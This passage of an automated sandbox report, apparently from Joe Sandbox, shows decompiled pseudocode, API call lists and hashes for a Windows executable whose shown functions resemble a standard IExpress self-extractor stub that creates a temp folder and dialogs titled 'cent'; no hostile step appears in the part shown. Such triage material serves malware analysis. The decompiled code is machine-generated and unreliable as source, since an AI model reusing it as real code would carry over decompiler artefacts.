                                                                                                                                                                                                      						if(_t24 == 0x3a) {
                                                                                                                                                                                                      							L21:
                                                                                                                                                                                                      							_t25 = GetFileAttributesA(0xe791e4);
                                                                                                                                                                                                      							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                      							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      								L26:
                                                                                                                                                                                                      								E00E7658A(0xe791e4, 0x104, 0xe71140);
                                                                                                                                                                                                      								_t27 = E00E758C8(0xe791e4);
                                                                                                                                                                                                      								__eflags = _t27;
                                                                                                                                                                                                      								if(_t27 != 0) {
                                                                                                                                                                                                      									__eflags =  *0xe791e4 - 0x5c;
                                                                                                                                                                                                      									if( *0xe791e4 != 0x5c) {
                                                                                                                                                                                                      										L30:
                                                                                                                                                                                                      										_t30 = E00E7597D(0xe791e4, 1, _t64, 1);
                                                                                                                                                                                                      										__eflags = _t30;
                                                                                                                                                                                                      										if(_t30 == 0) {
                                                                                                                                                                                                      											L35:
                                                                                                                                                                                                      											_t42 = 1;
                                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                                      											goto L36;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t42 = 1;
                                                                                                                                                                                                      										EndDialog(_t64, 1);
                                                                                                                                                                                                      										goto L36;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe791e5 - 0x5c;
                                                                                                                                                                                                      									if( *0xe791e5 == 0x5c) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t58 = 0x4be;
                                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t32 = E00E744B9(_t64, 0x54a, 0xe791e4, 0, 0x20, 4);
                                                                                                                                                                                                      							__eflags = _t32 - 6;
                                                                                                                                                                                                      							if(_t32 != 6) {
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t33 = CreateDirectoryA(0xe791e4, 0);
                                                                                                                                                                                                      							__eflags = _t33;
                                                                                                                                                                                                      							if(_t33 != 0) {
                                                                                                                                                                                                      								goto L26;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0x10);
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      							_push(0xe791e4);
                                                                                                                                                                                                      							_t58 = 0x4cb;
                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags =  *0xe791e4 - 0x5c;
                                                                                                                                                                                                      						if( *0xe791e4 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                      						if(_t24 != 0x5c) {
                                                                                                                                                                                                      							goto L32;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t34 = _t20 - 1;
                                                                                                                                                                                                      					__eflags = _t34;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						EndDialog(_t64, 0);
                                                                                                                                                                                                      						 *0xe79124 = 0x800704c7;
                                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t34 != 0x834;
                                                                                                                                                                                                      					if(_t34 != 0x834) {
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t37 = LoadStringA( *0xe79a3c, 0x3e8, 0xe78598, 0x200);
                                                                                                                                                                                                      					__eflags = _t37;
                                                                                                                                                                                                      					if(_t37 != 0) {
                                                                                                                                                                                                      						_t38 = E00E74224(_t64, _t46, _t46);
                                                                                                                                                                                                      						__eflags = _t38;
                                                                                                                                                                                                      						if(_t38 == 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe787a0);
                                                                                                                                                                                                      						__eflags = _t39;
                                                                                                                                                                                                      						if(_t39 != 0) {
                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t63 = 0x4c0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						E00E744B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L38;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t63 = 0x4b1;
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      0x00e7334c
                                                                                                                                                                                                      0x00e73351
                                                                                                                                                                                                      0x00e73354
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7335c
                                                                                                                                                                                                      0x00e73362
                                                                                                                                                                                                      0x00e73364
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73366
                                                                                                                                                                                                      0x00e73367
                                                                                                                                                                                                      0x00e73369
                                                                                                                                                                                                      0x00e7336a
                                                                                                                                                                                                      0x00e7336b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7336b
                                                                                                                                                                                                      0x00e7331c
                                                                                                                                                                                                      0x00e73323
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73329
                                                                                                                                                                                                      0x00e7332b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7332b
                                                                                                                                                                                                      0x00e7324c
                                                                                                                                                                                                      0x00e7324c
                                                                                                                                                                                                      0x00e7324f
                                                                                                                                                                                                      0x00e732c8
                                                                                                                                                                                                      0x00e732ce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e732ce
                                                                                                                                                                                                      0x00e73251
                                                                                                                                                                                                      0x00e73256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73271
                                                                                                                                                                                                      0x00e73277
                                                                                                                                                                                                      0x00e73279
                                                                                                                                                                                                      0x00e73298
                                                                                                                                                                                                      0x00e7329d
                                                                                                                                                                                                      0x00e7329f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e732b0
                                                                                                                                                                                                      0x00e732b6
                                                                                                                                                                                                      0x00e732b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e732be
                                                                                                                                                                                                      0x00e73280
                                                                                                                                                                                                      0x00e73289
                                                                                                                                                                                                      0x00e7328e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7328e
                                                                                                                                                                                                      0x00e7327b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7327b
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000003E8,00E78598,00000200), ref: 00E73271
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E733E2
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E733F7
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00E73410
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000836), ref: 00E73426
                                                                                                                                                                                                      • EnableWindow.USER32(00000000), ref: 00E7342D
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00E7343F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cent
                                                                                                                                                                                                      • API String ID: 2418873061-2129869747
                                                                                                                                                                                                      • Opcode ID: 924715773bf72bc58e1c3a09ba4338371e8c56231c6434d4fe9fee5f3df37ade
                                                                                                                                                                                                      • Instruction ID: 745883180e887bde93b63b868bce84d628554bf4d50e73676d74ece59c7ac1d5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 924715773bf72bc58e1c3a09ba4338371e8c56231c6434d4fe9fee5f3df37ade
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B15178703412417AF7B59B365C8CFBF6A499B86B09F40E038F21DB60D1DAA48A46B261
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E72CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				struct HRSRC__* _t31;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t43;
                                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				signed int _t67;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t13 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                      				_t65 = 0;
                                                                                                                                                                                                      				_t66 = __ecx;
                                                                                                                                                                                                      				_t48 = __edx;
                                                                                                                                                                                                      				 *0xe79a3c = __ecx;
                                                                                                                                                                                                      				memset(0xe79140, 0, 0x8fc);
                                                                                                                                                                                                      				memset(0xe78a20, 0, 0x32c);
                                                                                                                                                                                                      				memset(0xe788c0, 0, 0x104);
                                                                                                                                                                                                      				 *0xe793ec = 1;
                                                                                                                                                                                                      				_t20 = E00E7468F("TITLE", 0xe79154, 0x7f);
                                                                                                                                                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                      					_t64 = 0x4b1;
                                                                                                                                                                                                      					goto L32;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0xe7858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0xe79a34;
                                                                                                                                                                                                      					if(E00E7468F("EXTRACTOPT", 0xe79a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0xe79a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0xe79120 =  *0xe79120 & _t65;
                                                                                                                                                                                                      							if(E00E75C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0xe78a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe78184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0xe78a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E00E736EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0xe79a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0xe79a34 & 0x00000100) == 0 || ( *0xe78a38 & 0x00000001) != 0 || E00E718A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E00E76517(_t57, 0x7d6, _t34, E00E719E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00E72390(0xe78a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E00E744B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E00E7468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0xe78588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0xe79a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E00E744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E00E744B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0xe78588);
                                                                                                                                                                                                      										 *0xe79124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00e72dd3
                                                                                                                                                                                                      0x00e72df5
                                                                                                                                                                                                      0x00e72e02
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72dd5
                                                                                                                                                                                                      0x00e72dde
                                                                                                                                                                                                      0x00e72de3
                                                                                                                                                                                                      0x00e72e04
                                                                                                                                                                                                      0x00e72e0a
                                                                                                                                                                                                      0x00e72e10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72e10
                                                                                                                                                                                                      0x00e72dd3
                                                                                                                                                                                                      0x00e72dbb
                                                                                                                                                                                                      0x00e72da1
                                                                                                                                                                                                      0x00e72d5b
                                                                                                                                                                                                      0x00e72d5b
                                                                                                                                                                                                      0x00e72d5d
                                                                                                                                                                                                      0x00e72d69
                                                                                                                                                                                                      0x00e72d6e
                                                                                                                                                                                                      0x00e72f06
                                                                                                                                                                                                      0x00e72f06
                                                                                                                                                                                                      0x00e72f06
                                                                                                                                                                                                      0x00e72d59
                                                                                                                                                                                                      0x00e72f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E72CF9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00E72DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E72E0A
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: febabc729036d32f9b60530e628fc72c429285343764e74c8edf36e3814268b9
                                                                                                                                                                                                      • Instruction ID: 6bd1f275992b475f0a86355424822e4150105759fa66b940c0235897f45d7243
                                                                                                                                                                                                      • Opcode Fuzzy Hash: febabc729036d32f9b60530e628fc72c429285343764e74c8edf36e3814268b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C5103703403016EE765E7369D0AB7A3698EB91704F44E03DFB8DF51E2DBB48885D621
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E00E734F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0xe791d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0xe78584 = _t35;
                                                                                                                                                                                                      					E00E743D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0xe78184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E00E74FE0, 0, 0, 0xe78798);
                                                                                                                                                                                                      					 *0xe7879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E00E744B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0xe7858c);
                                                                                                                                                                                                      					_t38 =  *0xe78584; // 0x0
                                                                                                                                                                                                      					_t25 = E00E744B9(_t38, 0x4b2, 0xe71140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0xe791d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0xe7858c);
                                                                                                                                                                                                      						_t39 =  *0xe7879c; // 0x0
                                                                                                                                                                                                      						E00E73680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0xe7858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0xe7879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 00E73535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00E73541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 00E7355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(00E71140,00000000,00000020,00000004), ref: 00E73590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E735C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00E735F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00E735F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00E73610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 00E73617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00E73623
                                                                                                                                                                                                      • CreateThread.KERNEL32 ref: 00E73637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00E73671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: d4b229c7bf89d59f86a47676d9dda28c58adf6b32c5e9fccda133565a9d87255
                                                                                                                                                                                                      • Instruction ID: f44e1d3db83e8aa56bd98e5eef20505a8acc3482e904d90651ad9f2fdbf375b6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4b229c7bf89d59f86a47676d9dda28c58adf6b32c5e9fccda133565a9d87255
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0831F1B0240300BFD760DF76EC0DE2B3B68E7C5B10F64A429F60EB52A1CB718984EA50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E00E74224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
